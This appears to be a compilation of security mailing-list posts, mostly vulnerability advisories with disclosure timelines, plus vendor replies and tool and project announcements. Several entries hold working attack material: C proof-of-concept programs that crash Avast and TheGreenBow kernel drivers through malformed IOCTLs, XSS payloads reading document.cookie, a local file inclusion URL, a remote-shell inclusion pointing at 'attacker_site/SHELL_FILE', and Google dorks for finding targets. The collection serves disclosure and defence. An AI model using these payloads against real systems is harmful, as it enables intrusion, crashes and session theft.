[CVE-2016-2345] Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability
Document Title: === Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability References (Source): http://www.kb.cert.org/vuls/id/897144 https://www.securifera.com/advisories/cve-2016-2345 http://www.dameware.com/products/mini-remote-control/product-overview.aspx Release Date: = 2016-03-17 Product & Service Introduction: === Solarwinds Dameware Mini Remote Control allows for the remote administration of client systems of various operating system and architecture. Vulnerability Information: == Class: CWE-121: Stack-based Buffer Overflow Impact: Remote Code Execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2016-2345 Vulnerability Description: == A certain remote message parsing function inside the Dameware Mini Remote Control service does not properly validate the input size of an incoming string before passing it to wsprintfw. As a result, a specially crafted message can overflow into the bordering format field and subsequently overflow the stack frame. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the dwmrcs daemon. Vulnerability Disclosure Timeline: == 2015-12-17: Contact Solarwinds and Request Security Contact Info From Support Team 2015-12-22: Vendor Sends Link to Recent Patches, Denies Security Contact Info Request 2015-12-29: Notify Vendor Patches Are Unrelated, Offer POC, & Request Contact with Security Team Again 2016-12-31: Vendor Replies That Details Were Forwarded To Developers Although None Have Been Requested Or Given Yet 2016-01-08: Follow-up with Vendor; Send POC for Developers 2016-01-08: Vendor Confirms Reciept of POC & Forwards to Developers 2016-01-20: Enlist US-CERT Assistance with Vendor 2016-01-20: Vendor Asks If We Will Test A Patch; We Confirm With Vendor 2016-02-04: Follow-Up with Vendor to Receive Patch 2016-02-04: Vendors Sends Patch 2016-02-04: Notify Vendor Patch Consists of a NX Recompile. Notify Vendor of Workarounds & Urge For Actual Fix. Request Contact Info For Developers Again 2016-02-04: Vendors Forwards to Developers 2016-02-14: Update US-CERT on Progress. They Attempt to Contact Vendor Security Team Independantly 2016-03-03: Follow-up With Vendor 2016-03-03: Vendor Requests Remote Access to Our System 2016-03-04: Request Denied. We Suggest Several Trivial Potential Fixes For Vulnerability & Notify Of Impending 90 Disclosure Date 2016-03-08: Vendor Forwards to Developers 2016-03-17: Coordinated Public Disclosure with US-CERT Affected Product(s): Solarwinds Dameware Mini Remote Control 12.0 ( previous versions have not been verified ) Severity Level: === High Proof of Concept (PoC): === A proof of concept will not be provided at this time. Solution - Fix & Patch: === There is currently no patch. Please block remote access to port 6129 at a minimum. Security Risk: == The security risk of this remote code execution vulnerability is estimated as high. (CVSS 10.0) Credits & Authors: == Securifera, Inc - b0yd Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Securifera disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Securifera is not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Securifera or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, or hack into any systems. Domains: www.securifera.com Contact: contact [at] securifera [dot] com Social: twitter.com/securifera Copyright © 2016 | Securifera, Inc
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site scripting vulnerability. === Product: Wordfence Firewall Plugin For Wordpress Vendor: Wordfence Vulnerable Version(s): 5.1.2 Tested Version: 5.1.2 Advisory Publication: June 30, 2014 [without technical details] Vendor Notification: June 24, 2014 Vendor Patch: June 29, 2014 Public Disclosure: June 30, 2014 Vulnerability Type:Reflected Cross-Site Scripting CVE Reference: CVE-2014-4664 Risk Level: High Solution Status: Fixed by Vendor --- Reported By - Narendra Bhati ( R00t Sh3ll) Security Analyst @ Suma Soft Pvt. Ltd. ( IT Risk & Security Management Services , Pune ( India) Facebook - https://facebook.com/narendradewsoft twitter - https://www.twitter.com/NarendraBhatiNB Blog - http://hacktivity.websecgeeks.com Email - bhati.cont...@gmail.com --- Advisory Details: Narendra Bhati discovered vulnerability in Wordfence Firewall Plugin For Wordpress , which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Reflected Cross-Site Scripting (XSS) in Wordfence Firewall Plugin For Wordpress : CVE-2014-4664 The vulnerability exists due to insufficient sanitization of input data passed via the "whoisval" HTTP GET parameter to "http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval="; URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. This vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. The exploitation example below uses the "";alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)" JavaScript function to display "Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence" word: http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval=";;alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /) --- Solution: Update to " 5.1.4" From his official website or update from wordpress dashboard More Information: Vendor Public Advisory http://www.wordfence.com/blog/2014/06/security-fix-wordfence-5-1-4/ Full Disclosure With Technical Details - http://hacktivity.websecgeeks.com/word-press-firewall-plugin-xss/ ---
Modx CMS CSRF Bypass & XSS Vulnerabilities
Public Disclosure - http://hacktivity.websecgeeks.com/modx-csrf-and-xss/ === Product: MODX Revolution Severity: Critical Versions: 2.0.02.2.14 Vulnerability type: CSRF & XSS Report date: 2014-Jul-10 Fixed date: 2014-Jul-15 Description A significant vulnerability was discovered in the Manager login of MODX Revolution that also affects the use of the Login Extra. A malicious user could formulate a link that automatically logs the user into their own account, then redirects the user to a site the attacker controls immediately, exposing the user's CSRF token. This can be exploited with or without getting the user to enter their credentials in the form. Affected Releases All MODX Revolution releases prior to and including 2.2.14. Solution Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions.
[HTTPCS] ClanSphere 'where' Cross Site Scripting Vulnerability
HTTPCS Advisory : HTTPCS127 Product : ClanSphere Version : 2011.4 Date : 2014-03-07 Criticality level : Less Critical Description : A vulnerability has been discovered in ClanSphere, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'where' parameter to '/index.php' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Page : /index.php Variables : sort=6&action=list&where=[VulnHTTPCS]&mod=users Type : XSS Method : GET Solution : References : https://www.httpcs.com/advisory/httpcs127 Credit : HTTPCS [Web Vulnerability Scanner] ___ https://www.httpcs.com/en/advisories ___ Twitter : http://twitter.com/HTTPCS Web vulnerability scanner HTTPCS : https://www.httpcs.com/
Privoxy Proxy Authentication Credential Exposure - CVE-2013-2503
Privoxy Proxy Authentication Credential Exposure Product: Privoxy Project Homepage: privoxy.org Advisory ID: c22-2013-01 Vulnerable Version(s): 3.0.20 (and possibly prior) Tested Version: 3.0.20-1 (tested using Debian Sid) Vendor Notification: March 6, 2013 Public Disclosure: March 11, 2013 Vulnerability Type: Insufficiently Protected Credentials [CWE-522] CVE Reference: CVE-2013-2503 Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) Discovery: Chris John Riley ( http://blog.c22.cc ) Advisory Details: During research into browser and proxy server handling of HTTP Response Codes, an issue with the way that Privoxy handles HTTP Response code 407 "Proxy Authentication Required" was discovered. Privoxy in versions 3.0.20 (and possibly prior) ignores the presence of "Proxy-Authenticate" and "Proxy-Authorization" headers and allows these values to be passed to and from a remote server without modification. The resulting behavior could allow a malicious websites to spoof a Proxy-Authentication response appearing to originate from the Privoxy service. The Privoxy user will then be prompted for a username and password that appears to originate from the Privoxy software. Scenario: 1) A Privoxy user visits a website using a browser of their choice 2) The remote website responds to the request with a 407 "Proxy Authentication Required" HTTP response code and the appropriate "Proxy-Authenticate: Basic" HTTP response header 3) This response is passed through the Privoxy service without modification to the users browser 4) As the browser is configured to use a proxy server, the browser believes that the upstream proxy (Privoxy) has requested authentication and prompts the user for a username and password. This prompt states that the proxy server at "127.0.0.1:8118" requires authentication (this prompt may vary if Privoxy is running on a machine other than localhost and/or on a non-default port number) 5) If the user enters a username and password, the browser will send a request through Privoxy to the remote website with a "Proxy-Authorization: " HTTP request header (where XXX is a base64 encoded version of the username and password the user entered at the browsers proxy authentication prompt) 6) The remote website receives this header and can store or re-use these captured credentials Proof of Concept: http://c22.cc/POC/c22-2013-01.php The above URL will respond with a "Proxy-Authenticate: basic" header when a request is received that does no contain a "Proxy-Authorization" header. This will prompt the users browser to request a username/password from the user. If you enter a value in the username/password box and click ok, it will send a Base64 encoded version to the remote website (the server will display the response headers at the bottom of the resulting page under request headers (one of the values will be "Proxy-Authorization" with a base64 encoded version of the entered username/password). For a full walkthrough it is suggested to capture this in your favourite packet capture program and walk through the requests to view the entire process. Note --> The above POC does not store any data sent to the server, however it is suggested to use bogus credentials if testing this proof of concept. Solution: The following solution was suggested and implemented in Privoxy 3.0.21 stable. Proxy authentication headers are removed unless the new directive enable-proxy-authentication-forwarding is used. Forwarding the headers potentionally allows malicious sites to trick the user into providing it with login information. References: Privoxy 3.0.21 ChangeLog --> http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup Vulnerability Timeline: March 5, 2013 20:00 - Initial discovery of vulnerability March 6, 2013 14:48 > Emailed Privoxy developer list to request a security contact March 6, 2013 15:26 < Received response with dedicated security contact information March 6, 2013 16:01 > Emailed details of the vulnerability to security contact March 6, 2013 17:19 < Received response acknowledging issue. Fix indicated in upcoming release March 6, 2013 18:38 > Acknowledged receipt of email and advised of updated CVSSv2 score March 7, 2013 15:50 < Received response detailing proposed fix, including link to CVS check-in of new code March 7, 2013 18:48 > Acknowledged receipt of email March 9, 2013 16:54 > Emailed CVE number to security contact and requested information on release plans March 10, 2013 14:28 < Received confirmation of release timeline March 10, 2013 14:58 - Release of Privoxy 3.0.21 stable March 11, 2013 07:45 - Release of advisory
Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =[Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation] Author(s): Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry {AT} GMAIL {DOT} COM Website: http://evilcry.netsons.org http://www.insight-tech.org http://evilcodecave.blogspot.com http://evilcodecave.wordpress.com Copyright 2009 Giuseppe Bonfa'. All rights reserved. ***Disclosure Timeline*** Discover Date: - PoC Code: porting C++ 26/09/2009 Vendor Notify: 26/09/2009 Vendor Reply: 15/09/2009 Vendor Fix: 15/10/2009 == Product Details: == Affected Product: Avast antivirus (other versions could be affected) Product Version: 4.8.1356.0 Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver) Category: Local Denial of Service due to kernel memory corruption (BSOD) (untested) Local Privilege Escalation Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6 == Vulnerability Details: == Avast's aswRdr.sys Driver does not sanitize user supplied input IOCTL) and this lead to Kernel Heap Overflow that propagates on the system with a BSOD and potential risk of Privilege Escalation. == Technical Details: == kd> !analyze -v Bugcheck: BAD_POOL_HEADER Arg1: 0020, a pool block header size is corrupt. Arg2: 8136c618, The pool entry we were looking for within the page. Arg3: 8136c778, The next pool entry. <-- OVERWRITTEN HEADER Arg4: 1a2c0001, (reserved) POOL_ADDRESS: unable to get nt!MmSpecialPoolStart unable to get nt!MmSpecialPoolEnd unable to get nt!MmPoolCodeStart unable to get nt!MmPoolCodeEnd 8136c618 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. f7c70a18 80543c86 0019 0020 8136c618 nt+0x21925 f7c70a68 804f388c 8136c620 81571de8 nt+0x6cc86 f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c f7c70b0c 806d1c35 f7c70b24 nt+0x25fbf f7c70b24 806d1861 badb0d00 81603548 hal+0x2c35 f7c70bb4 804f0498 81571de8 81348028 hal+0x2861 f7c70be8 f76ee9ad 81347ec8 81565740 nt+0x19498 f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333 f7c70d00 8056d33c 001c nt+0x9d9d1 f7c70d34 8053c808 001c nt+0x9633c f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808 f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94 f7c70d6c 0012fee0 04040404 04040404 0xbadb0d00 f7c70d70 04040404 04040404 0x12fee0 f7c70d74 04040404 0x4040404 f7c70d78 0x4040404 == Proof of Concept: == Exploitation for Privilege Escalation is not Trivial but Possible +---+ /* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption * * Author(s): Giuseppe 'Evilcry' Bonfa' *AbdulAziz Hariri * E-Mail: evilcry _AT_ gmail _DOT_ com * Website: http://evilcry.netsons.org * http://evilcodecave.blogspot.com * http://evilcodecave.wordpress.com * http://evilfingers.com * * Disclosure Timeline: As specified in the Advisory. */ #define WIN32_LEAN_AND_MEAN #include #include BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab { WCHAR DeviceName[MAX_PATH]; HANDLE hDevice; if ((GetVersion() & 0xFF) >= 5) { wcscpy(DeviceName, L".\\Global\\"); } else { wcscpy(DeviceName, L".\\"); } wcscat(DeviceName, DriverName); printf("Opening.. %S\n", DeviceName); hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("CreateFile() ERROR %d\n", GetLastError()); return FALSE; } *lphDevice = hDevice; return TRUE; } int main() { HANDLE hDev = NULL; DWORD Junk; if(!OpenDevice(L"aswRDR",&hDev)) { printf("Unable to access aswMon"); return(0); } char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (Buff) { memset(Buff, 'A', 0x156); DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL); printf("DeviceIoControl Executed..\n"); } else { printf("VirtualAlloc() ERROR %d\n", GetLastError()); } return(0); } Credits: Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa' and AbdulAziz Hariri. === Disclaimer: === The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indir
Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.
Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php ---[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]-> Author: Giuseppe 'Evilcry' Bonfa' E-Mail: evilcry {AT} GMAIL {DOT} COM Website: http://evilcry.netsons.org http://evilcodecave.blogspot.com http://evilcodecave.wordpress.com http://evilfingers.com ***Disclosure Timeline*** Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009 Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009 After various mails about publishing date ignored, here the Public Disclosure. +--+ Product: Avast antivirus 4.8.1351.0 (other versions could be affected) Affected Component: aswMon2.sys 4.8.1351.0 Category: Local Denial of Service due to kernel memory corruption (BSOD) (untested) Local Privilege Escalation +---+ --[Details]---> Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates on the system with a BSOD and potential risk of Privilege Escalation. 00010F70cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed 00010F77jnz loc_111AC 00010F7Dmov esi, [ebp+SourceString] 00010F80cmp [esi], ebx 00010F82mov [ebp+arg_C], ebx Affected IOCTL is B2C80018 UNEXPECTED_KERNEL_MODE_TRAP_M (107f) Transfer Type: METHOD_BUFFERED STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. f76f3234 8053d251 f76f3250 f76f32a4 nt+0x600fa f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251 f76f3328 8052c793 41414141 f76f377c nt+0x55712 f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793 . f76f56d8 f7756a04 badb0d00 8055b256 nt+0x66251 f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04 f76f5770 41414141 41414141 41414141 41414141 0x41414141 f76f5774 41414141 41414141 41414141 41414141 0x41414141 f76f5778 41414141 41414141 41414141 41414141 0x41414141 f76f577c 41414141 41414141 41414141 41414141 0x41414141 f76f5780 41414141 41414141 41414141 41414141 0x41414141 . +---+ / * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption * * Author: Giuseppe 'Evilcry' Bonfa' * E-Mail: evilcry _AT_ gmail _DOT_ com * Website: http://evilcry.netsons.org * http://evilcodecave.blogspot.com * http://evilfingers.com * * Vendor: Notified * * No L.P.E. for kiddies * / #define WIN32_LEAN_AND_MEAN #include < windows.h> #include < stdio.h> BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab { WCHAR DeviceName[MAX_PATH]; HANDLE hDevice; if ((GetVersion() & 0xFF) >= 5) { wcscpy(DeviceName, L".\\Global\\"); } else { wcscpy(DeviceName, L".\\"); } wcscat(DeviceName, DriverName); printf("Opening.. %S\n", DeviceName); hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("CreateFile() ERROR %d\n", GetLastError()); return FALSE; } *lphDevice = hDevice; return TRUE; } int main() { HANDLE hDev = NULL; DWORD Junk; if(!OpenDevice(L"aswMon",&hDev)) { printf("Unable to access aswMon"); return(0); } char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (Buff) { memset(Buff, 'A', 0x288); DeviceIoControl(hDev,0xB2C80018,Buff, 0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL); printf("DeviceIoControl Executed..\n"); } else { printf("VirtualAlloc() ERROR %d\n", GetLastError()); } return(0); } +---+ Regards, Giuseppe 'Evilcry' Bonfa'
TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Original Advisory Link: https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php ---[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local Privilege Escalation]-> Author: Giuseppe 'Evilcry' Bonfa' E-Mail: evilcry {AT} GMAIL {DOT} COM Website: http://evilcry.netsons.org http://evilcodecave.blogspot.com http://evilcodecave.wordpress.com http://evilfingers.com http://malwareAnalytics.com [under construction] Release Date: 15/08/2009 +-+ Product: TheGreenBow VPN Client 4.61.003 (other versions could be affected) Affected Component: tgbvpn.sys Category: Local Denial of Service (BSOD) (untested) Local Privilege Escalation +-+ --[Details]---> TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD, and potential risk of Privilege Escalation. Affected IOCTL is 0x8034 Transfer Type: METHOD_BUFFERED STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51 0x841d36a8 ++ /* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC * * Author: Giuseppe 'Evilcry' Bonfa' * E-Mail: evilcry {AT} gmail. {DOT} com * Website: http://evilcry.netsons.org * http://evilcodecave.blogspot.com * http://evilcodecave.wordpress.com * http://evilfingers.com * http://malwareAnalytics.com [under construction] */ #include #include #include int main(void) { HANDLE hDevice; DWORD Junk; system("cls"); printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n"); hDevice = CreateFileA(".\\tgbvpn", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("\n Unable to Device Driver\n"); return EXIT_FAILURE; } DeviceIoControl(hDevice, 0x8034,(LPVOID) 0x8001, 0, (LPVOID) 0x8002, 0, &Junk, (LPOVERLAPPED)NULL); return EXIT_SUCCESS; } ++ Regards, Giuseppe 'Evilcry' Bonfa' www.EvilFingers.com
JibberBook GuestBook 2.3 Multiple Vulnerabilities
### ### [»] Script: [ JibberBook ] [»] Language: [ PHP ] [»] Website:[ http://jibberbook.com ] [»] Founder:[ Onur YILMAZ aka DJR ] [»] Site: [ www.onuryilmaz.info ] ### ### === [ data source of comments disclosure (.xml file) ] === [»] [JibberBook]/data_layer/xml/comments.xml === [ output ] === 127.0.0.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 0 ### ### === [ HTML Code Injection ] === [»] add new message ### ### === [ Google Dork ] === [»] "JibberBook created by" ### ###
Blogsa <= 1.0 Beta 3 XSS Vulnerability
### # Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability# # Software Site: blogsa.net # # Discovered by: Onur YILMAZ aka DJR # # Blog: http://www.onuryilmaz.info# # E-mail: contactonuryilmazinfo # ### # XSS http://localhost/Widgets.aspx?w=Search&p=do&searchText=alert(document.cookie) # Screen http://img14.imageshack.us/img14/7803/12371681.jpg This message was sent using IMP, the Internet Messaging Program.
Afian Document Manager Local File Inclusion
Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system. This software has a secutity hole allow attackers download any files if they know the path. Vendor: afian.com Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion. Version: Unknown (maybe 2.x.x) Demo: http://demo.afian.com Exploit: Google Dork: Afian document manager 1. Bypass+Fullpath Disclosure: http://site/path/css/includer.php?files=NOT_EXIST_FILE It doesn't ask username/password and display fullpath. 2. Local File Inclusion: Read any files if know exactly path_of_file http://site/path/css/includer.php?files=PATH_TO_FILE
PHCDownload 1.1.0 Vulnerabilities
A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy. PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system. Vendor: http://www.phpcredo.com Version: 1.1.0 and older Vuls file: seach.php Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called. Exploit: http://[site]/[path_to_script]/search.php Input: ">< Example: http://[site]/[path_to_script]/search.php?string=";>< http://attacker_site/SHELL_FILE";); ?>
PGP Desktop 9.0.6 Denial Of Service - ZeroDay
--- Advisory: PGP Desktop 9.0.6 Denial Of Service Vulnerability. Version Affected: PGP Desktop 9.0.6 [Build 6060] (other version could be affected) Component Affected: PGPwded.sys Release Date: Release Date. 23 December ,2008 Description: PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD. Affected IOCTL is 0x80022038. Proof-of-Concept: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php";>Click Here Credit: Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / http://evilcry.netsons.org) Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages. ---
Re: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
The file specified ("toonchapter8.php") has NEVER existed in FMDeluxe or any other script created by WSDeluxe. This is a false vulnerability report, and should be removed.
WASC-Articles: 'The Importance of Application Classification in Secure Application Development'
The Web Application Security Consortium is proud to present 'The Importance of Application Classification in Secure Application Development' by Rohit Sethi. In this article Rohit describes the importance of Application Classification during the secure development process. This document can be found at http://www.webappsec.org/projects/articles/ . Regards, - Robert Auger articles_at_webappsec.org http://www.webappsec.org Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquires can be sent to articles_at_webappsec.org "Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." http://www.webappsec.org";;>http://www.webappsec.org
Metaye Released - ZmbScap
Team Metaeye has released new project Zmbscap as: The zombie scapper is an automated perl tool for detecting and stopping distributed denial of service programs. The tool automatically searches and scans the desired target for programs by looking for the ports that are used by the zombie masters. It stops the zombie masters by sending a kill/stop trigger. You can find the tool at: http://www.metaeye.org - [MSG] Metaeye Security Group http://www.metaeye.org
Re: DotClear v1.2.5
So what ? Even with register_globals = On it ends with a PHP error, nothing more. Where's your exploit? There's nothing on your site. I may have missed something and I'd like to thank you to warn us before the reste of the world. -- Olivier Meunier
SQID v0.2 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites.Current version looks for SQL injections and common errors in website urls found by performing a google search. The use of google search SOAP API has been removed due to no more issuing of keys. Now it directly performs search over the web. Sqid can be downloaded from http://sqid.rubyforge.org. -- MSG // http://www.metaeye.org
SQID v0.1 - SQL Inhection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites.Current version looks for SQL injections and common errors in website urls found by performing a google search. Sqid can be downloaded from http://sqid.rubyforge.org. -- MSG // http://www.metaeye.org
Re: AFCommerce Shopping Cart
Hi, thank you for reporting this problem. I am Paul, the author of the software, so I would like to do everything possible to correct this issue. The free version of my software is not open source, and not that the encryption is protecting it very well, I'm sure a good hacker could crack the encryption, but the point is to not let the security features be readable to everyone, so hopefully it will lessen problems like this. Ok, so with that said, I tested the classic 'or 1=1 on my demo store, and nothing was returned. It said no matching results, so are you sure this worked for you ? I know I am not perfect in any way so I will always look in to this stuff, but when I first read your post I was confused because I attacked my own site for hours checking for that exact kind of attack. I don't like to publicly post too much info about how and why I set things up, as to not give anyone any ideas on how to attack my software, but the search feature (I thought) would not be attackable. Now since you did it already, I may be wrong, but I do not use the keywords inside the sql statement. For example, I do not use anything like: select * from products where name = 'userinputvariable'. I have some security functions set up to clean user input, if you know the software, its afc_secure_string_POST. In the search script, I use that function for all input EXCEPT the keywords, but that is because the keywords are not used at all in sql statements (actually none of the input is). Basically, I break the keywords down in to separate words (explode by spaces), then I do my own sql select statements (without any user input at all) and simply check to see if the words match. There is more to my search than that, but for this topic that is all that matters. So if someone were to type in any sql injection code, that code would never be queried. Your 'or 1=1 would simply be stored in an array, in your example it would consider it 2 different words (if you didn't use the space it would be one keyword), but the only time that word would be used is in a substr_count statement, which can not do any damage. If this problem does exist, please report back what i am missing from your comment, but since it did not work for me just now, and also since the keywords never hit an sql statement, at this point I will disagree with you. Also make sure you did this on my current demo store, which uses version 2.5. I know that version 1 sucked as far as validation was concerned. I first released the code just to see if anyone would use it, so it was done quickly, but after I had a small following, I added a whole bunch of security features in version 2, and validated EVERYTHING (I hope). Feel free to mess with my demo store, http://crinicart.com , just please do no t attack my server or do any damage. As for now, I see your comments as helping the project find holes, which is great, I do want it to be perfect. So if you find something I will be more than willing to listen, just please do not do any damage to prove a point. Its not necessary since I will try out anything that comes up. Your second point about the reviews, I am about to test that now. With this, you are probably correct. I had more validation in there, but people complain when I did that because they couldn't add html. I though text only was fine, but I wanted to make people happy. I am probably going to take out all < and > symbols. It does check for normal php tags, but I guess someone could still use a script html tag for php attacks. So since it currently allows html I agree someone could deface the site, but only when reading the attacked review, and since most users do not use that feature, I didn't see it as a big deal. Also, the review is escaped with mysql_real_escape_string and a few other things. the only way this could be perfect is to strip all html tags, and that was already in my mind to do. I'd like to hear what you think, as well as, anyone else with an opinion about your comments (and mine). If a problem is found, it will be fixed the next day, but its tough to be the only developer of software used by many people because I get all kinds of developers telling me something is written poorly just to feel better about themselves. You sound like you know what you are talking about, so I took your comments seriously. If you are correct, like I said I will fix it and thank you. If you are not, I would like to clear it up so my users do not become scared, or hurt my creditibility. Thank you, Paul Crinigan
Re: vbulletin.com Multiple XSS Vulnerabilities
These XSS vulnerabilities have all been detected and patched.
Announcement: The Web Hacking Incidents Database
"The web hacking incident database (WHID) is a Web Application Security Consortium project dedicated to maintaining a list of web applications related security incidents. The goal is to serve as a tool for raising awareness of the web application security problem and provide the information for statistical analysis of web applications security incidents." Link: http://www.webappsec.org/projects/whid/ For further information please contact Ofer Shezaf ([EMAIL PROTECTED]), the project leader. Regards, - Robert Auger contact__at_webappsec.org http://www.webappsec.org - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Announcement: WASC Threat Classification in German
Web Application Security Consortium (WASC) Announcement We're proud to present the german translation of the Threat Classification. On behalf of WASC, we'd like to thank the following for their hard work and contribution: Achim Hoffmann Albert Caruana Stefan Strobel Daniela Strobel Download: http://www.webappsec.org/projects/threat/ Regards, - Robert Auger [EMAIL PROTECTED] - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Announcement: Domain Contamination By Amit Klein
